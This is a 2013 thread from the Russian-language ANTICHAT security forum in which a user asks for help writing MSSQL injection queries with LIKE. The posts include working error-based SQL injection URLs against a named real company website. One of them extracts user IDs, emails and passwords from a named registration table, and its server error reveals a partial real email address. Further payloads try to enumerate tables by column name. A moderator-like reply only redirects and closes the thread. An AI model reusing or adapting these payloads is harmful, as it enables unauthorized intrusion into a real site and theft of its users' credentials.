HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу вопрос по mssql inj
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.05.2013, 21:24
w0rkX
Новичок
Регистрация: 15.05.2013
Сообщений: 6
Провел на форуме:
2037

Репутация: 0
По умолчанию
Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе

я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д

как получить структуру, колонки и содержимое таблиц я знаю

но вот с LIKE у меня не получается не могу понять почему

чтобы было понятнее я хочу рассмотреть на примере

Код HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD='
есть инъекция

Код HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(userid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20as%20nvarchar)%20from%20Piaggio..tbSSORegistration%20where%20userid%3E1)--
Conversion failed when converting the nvarchar value '1370~industrialcars@dealer.piaggio.~???.......... ............' to data type int.

в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword

пробую через LIKE вывести имя таблицы в которой есть колонка email

Код HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--
выводит

Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.

пробовал указать базу

Код HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--
пробовал и так

Код HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25email%25')--
подскажите плз кто знает как правильно запрос составить с LIKE
 
Ответить с цитированием

  #2  
Старый 16.05.2013, 21:53
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Подобные вопросы должны задаваться тут

Закрыто.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.